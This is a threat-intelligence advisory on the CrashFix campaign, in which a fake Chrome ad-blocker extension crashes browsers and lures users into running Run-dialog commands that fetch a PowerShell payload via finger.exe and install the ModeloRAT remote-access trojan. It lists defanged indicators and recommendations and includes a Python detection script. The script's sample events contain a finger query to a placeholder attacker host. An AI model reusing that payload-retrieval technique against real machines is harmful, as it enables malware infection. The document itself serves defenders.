CrashFix Malicious Browser Extension Campaign Leading to ModeloRAT Infections
January 23rd, 2026
High

Our Cyber Threat Intelligence Unit identified a sophisticated malicious campaign, tracked as CrashFix, that abuses a trojanized browser extension to crash users’ web browsers and socially engineer them into executing harmful commands that ultimately lead to malware infection. The extension posed as a fake ad blocker called “NexShield – Advanced Web Guardian” and was downloaded from the official Chrome Web Store before its removal. After installation, the extension deliberately triggers browser crashes and displays deceptive security warnings that prompt the user to execute attacker-supplied commands. These actions lead to the deployment of a previously undocumented Python-based Remote Access Trojan (RAT) named ModeloRAT on compromised machines. The activity demonstrates an evolution of ClickFix-style social engineering techniques that exploit user frustration to gain execution and persistence on Windows systems.
Technical Details
Attack Type: Malicious browser extension-based attack.
Severity: High.
Malware Campaign Name: CrashFix
Attack Vector: Malicious Chrome extension (“NexShield – Advanced Web Guardian”) impersonating a known ad blocker that deliberately crashes the browser.
Payload Delivery: Executing the malicious command leverages the Windows utility finger.exe to retrieve a PowerShell payload from attacker infrastructure. This payload leads to ModeloRAT deployment, which performs system reconnaissance, establishes persistence via the Registry, and enables remote control, command execution, and data exfiltration.
Delivery Method:
Malicious advertisement displayed during searches for ad blockers.
Redirection to a fake Chrome extension hosted on the official Chrome Web Store.
Extension masquerades as “NexShield Advanced Web Guardian”, a clone of uBlock Origin Lite.
The browser crash triggers a fake security warning prompting users to manually execute attacker-provided commands via the Windows Run dialog.

Impact
Users installing the malicious extension may be tricked into running arbitrary commands that install malware.
Infected systems may execute ModeloRAT, a fully-featured remote access trojan with persistence.
Domain-joined (corporate) systems are prioritized, enabling deeper network access and potential lateral movement.
Attackers can gather system information, maintain persistence, and execute arbitrary binaries or scripts.
The social engineering component undermines user trust in security warnings and extensions.
Malicious extensions may be installed en masse via deceptive advertising, highlighting supply-chain risks in browser add-ons.
Detection Method
Browser Extension Audit: Identify and remove untrusted or unfamiliar Chrome extensions, particularly “NexShield – Advanced Web Guardian.”
Resource Monitoring: Look for high browser CPU or memory usage spikes consistent with denial-of-service loops.
Clipboard Inspection: Alert on unanticipated malicious commands being copied to the user's clipboard following extension installation.
PowerShell Activity: Monitor PowerShell invocations initiated from Run dialog prompts without prior user authorization.
Process and Persistence Monitoring: Hunt for Python processes, registry persistence entries, and unusual network connections from newly installed extensions.
Network Traffic Analytics: Detect outbound connections to suspicious command-and-control domains or typo-squatted infrastructure used for tracking and payload delivery.
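One way to operationalize the PowerShell and process-monitoring items above, as an added example that is not part of the original advisory: it scans Sysmon-style process-creation events for a command launched from explorer.exe (the Run dialog) whose process tree pairs finger.exe querying a remote host with powershell.exe, the retrieval chain the Payload Delivery section describes. The event fields, PIDs, the placeholder host c2-host.invalid and the heuristics are assumptions, and the sample events are constructed rather than real telemetry.

```python
from collections import defaultdict
# Hunts for the CrashFix chain: a command launched by explorer.exe (the Run dialog)
# whose process tree pairs finger.exe querying a remote host with powershell.exe.
# Heuristics, field names, PIDs and the host name are this example's assumptions.
INTERACTIVE_PARENT = "explorer.exe"
LOCAL_HOSTS = {"", "localhost", "127.0.0.1", "::1"}
EVENTS = [  # constructed sample events, not real telemetry; c2-host.invalid is a placeholder
    {"pid": 100, "ppid": 1,   "image": "explorer.exe",   "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "cmd.exe",        "cmdline": "cmd.exe /c <run-dialog command>"},
    {"pid": 201, "ppid": 200, "image": "finger.exe",     "cmdline": "finger user@c2-host.invalid"},
    {"pid": 202, "ppid": 200, "image": "powershell.exe", "cmdline": "powershell -"},
    {"pid": 300, "ppid": 100, "image": "powershell.exe", "cmdline": "powershell -File build.ps1"},
    {"pid": 301, "ppid": 300, "image": "finger.exe",     "cmdline": "finger localhost"},  # benign
]

def finger_target(cmdline):
    """Return the remote host a finger command queries; None if local or not finger."""
    parts = cmdline.split()
    exe = parts[0].lower().strip('"') if parts else ""
    args = [a for a in parts[1:] if not a.startswith("-")]  # drop switches such as -l
    if not (exe.endswith("finger.exe") or exe == "finger") or not args:
        return None
    host = args[0].rsplit("@", 1)[-1].lower()                # user@host -> host
    return None if host in LOCAL_HOSTS else host

def find_crashfix_chains(events):
    by_pid, children = {e["pid"]: e for e in events}, defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e["pid"])
    image = lambda pid: by_pid[pid]["image"].lower() if pid in by_pid else ""
    alerts = []
    for e in events:
        host = finger_target(e["cmdline"]) if e["image"].lower() == "finger.exe" else None
        if host is None:
            continue
        root = e                      # walk up to the process explorer.exe launched
        while root["ppid"] in by_pid and image(root["ppid"]) != INTERACTIVE_PARENT:
            root = by_pid[root["ppid"]]
        if image(root["ppid"]) != INTERACTIVE_PARENT:
            continue                  # not an interactive launch; out of scope for this rule
        stack, subtree = [root["pid"]], []
        while stack:                  # collect that command's whole subtree
            pid = stack.pop()
            subtree.append(pid)
            stack.extend(children[pid])
        ps = sorted(p for p in subtree if image(p) == "powershell.exe")
        if ps:
            alerts.append({"root_pid": root["pid"], "finger_pid": e["pid"], "target": host, "powershell_pids": ps})
    return alerts
```

Running it over real Sysmon Event ID 1 data only requires mapping ProcessId, ParentProcessId, Image and CommandLine onto the same four keys.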
Indicators of Compromise
Indicator Type | Value |
IP Address | 170.168.103[.]208 |
IP Address | 158.247.252[.]178 |
IP Address | 199.217.98[.]108 |
SHA-256 Hash | fbfce492d1aa458c0ccc8ce4611f0e2d00913c8d51b5016ce60a7f59db67de67 |
SHA-256 Hash | 6399c686eba09584bbbb02f31d398ace333a2b57529059849ef97ce7c27752f4 |
SHA-256 Hash | c15f44d6abb3a2a882ffdc9b90f7bb5d1a233c0aa183eb765aa8bfba5832c8c6 |
SHA-256 Hash | c46af9ae6ab0e7567573dbc950a8ffbe30ea848fac90cd15860045fe7640199c |
Domain | nexsnield[.]com |

Recommendations
Remove Malicious Extensions: Uninstall unrecognized or suspicious extensions from all browsers.
Restrict Extension Installation: Only allow vetted extensions via enterprise allowlists on managed endpoints.
User Awareness: Educate users to avoid installing extensions from deceptive ads and never execute commands from untrusted warnings.
Endpoint Protection: Deploy and tune EDR solutions to detect abnormal PowerShell and LLMNR behaviors.
Clipboard Monitoring: Alert on suspicious clipboard changes preceding execution of commands via Run dialogs.
Network Controls: Block or monitor traffic to known malicious domains associated with CrashFix and ModeloRAT.
Conclusion
The KongTuke CrashFix campaign demonstrates a sophisticated evolution of social engineering attacks by combining browser extension abuse, deliberate resource exhaustion, and user-driven command execution. By impersonating a trusted open-source project and exploiting user frustration during browser crashes, threat actors have created a self-sustaining infection loop. The deployment of ModeloRAT on domain-joined machines highlights a clear focus on corporate environments and long-term access. The campaign underscores the risks posed by malicious extensions even when distributed through legitimate platforms. Organizations must remain vigilant against browser-based threats that abuse trusted software and user behavior.